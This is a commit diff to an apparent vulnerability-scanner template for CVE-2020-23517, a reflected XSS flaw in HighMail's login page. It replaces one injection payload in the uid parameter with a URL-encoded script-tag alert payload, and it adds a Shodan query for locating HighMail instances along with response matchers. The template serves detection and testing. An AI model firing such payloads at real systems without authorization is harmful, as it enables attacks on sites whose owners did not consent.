Update CVE-2020-23517.yaml

2022-07-02 18:29:01 +05:30 · 2022-07-02 18:29:01 +05:30 · cfba4d0de9
parent df36c380cd
commit cfba4d0de9
1 changed files with 12 additions and 3 deletions
--- a/cves/2020/CVE-2020-23517.yaml
+++ b/cves/2020/CVE-2020-23517.yaml
@ -13,21 +13,30 @@ info:
    cvss-score: 6.1
    cve-id: CVE-2020-23517
    cwe-id: CWE-79
-  tags: xss,cve,cve2020
+  metadata:
+    verified: true
+    shodan-query: title:"HighMail"
+  tags: cve,cve2020,xss,cms,highmail

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
+      - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
+
      - type: word
        words:
          - text/html
        part: header
+
      - type: word
        words:
-          - "<img src=\"x\" onerror=\"alert('XSS')"
+          - 'value=""><script>alert(document.domain)</script>'
+
+      - type: status
+        status:
+          - 200

 # Enhanced by mp on 2022/03/14